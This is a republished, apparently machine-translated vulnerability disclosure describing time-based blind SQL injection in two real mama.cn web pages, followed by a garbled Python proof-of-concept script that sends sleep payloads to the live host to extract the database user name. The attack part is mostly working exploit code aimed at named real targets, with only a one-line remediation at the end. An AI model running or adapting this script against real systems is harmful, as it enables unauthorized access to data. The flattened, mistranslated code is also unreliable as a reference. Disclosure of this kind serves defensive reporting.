Mysql blind note (poc) on a website of alimama)

Source: Internet
Author: User

Mysql blind note (poc) on a website of alimama)

Mymysqlblind Injection

URL: http://brandbase.mama.cn/yikexin.php? Ctype = * & mod = growth & op = detail & pgcount = 12 & tid = 1520677

POST parameter: page = 20

Problematic parameter ctype:

Sqlmap cannot run this point. It was modified using the lijiejie script and didn't want to build the wheel on its own.

This is because there are two, and the other is the main station. Because of the network environment, the URL cannot be accessed, but I remember that

What does the current user start with hr? The length is 36,

URL: http://www.mama.cn: 80/photo/index. php? A = Search & d = index & g = Search & gotosearch = yes & keyword = * & num = 25 & page = 1 & searchtype = photo

The problematic parameter is keyword,

Poc:

#-*-Coding: UTF-8 -*-#! /Usr/bin/env python # mysql_timebased.pyimport httplibimport urllibheaders = {'user-agent': 'mozilla/5.0 (Windows NT 6.1; WOW64; rv: 37.0) gecko/20100101 Firefox/37.0 '} payloads = 'abcdefghijklmnopqrstuvwxyz1234567890. @ _ * % 'def GetUlength (): # Get the length of the current user userlen = 0 for I in range (): err_count = 0 for j in range (3): try: s1 = "length (user () = % s" % I s = "if (" + s1 + ", sleep (3), 0) /* 'xor (if (1, sleep (3), 0) OR % 22 'Xor (if (1, sleep (3), 0) OR % 22 */"url = '/yikexin. php? Ctype = % s & mod = growth & op = detail & pgcount = 12 & tid = 1520677 '% s body = "page = 20" conn = httplib. HTTPConnection ('brandbase .mama.cn ', timeout = 3) conn. request (method = 'post', headers = headers, url = url, body = urllib. quote (body) conn. getresponse () conn. close () print '*', counter T: err_count + = 1 if err_count = 3: userlen = I break return userlendef GetUser (l ): # Getting the current user name user = ''for I in range (1, l): for payload in pay Loads: err_count = 0 # print payload for j in range (3): try: s1 = "ascii (mid (lower (user (), % s, 1 )) = % s "% (I, ord (payload) s =" if ("+ s1 +", sleep (3), 0)/* 'XOR (if (1, sleep (3), 0) OR % 22 'XOR (if (1, sleep (3), 0) OR % 22 */"url ='/yikexin. php? Ctype = % s & mod = growth & op = detail & pgcount = 12 & tid = 1520677 '% s body = "page = 20" conn = httplib. HTTPConnection ('brandbase .mama.cn ', timeout = 3) conn. request (method = 'post', headers = headers, url = url, body = urllib. quote (body) conn. getresponse () conn. close () print '*', counter T: err_count + = 1 if err_count = 3: user + = payload print '\ n [info]', user break return user def main (): userlen = GetUlength () print "user length: \ n", userlen current_user = GetUser (userlen) print "\ n CurrentUser is :", current_userif _ name _ = '_ main _': print 'mysql-timebased-sqlinjection: \ n' main ()

 

Solution:

Filtering and structured SQL query

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.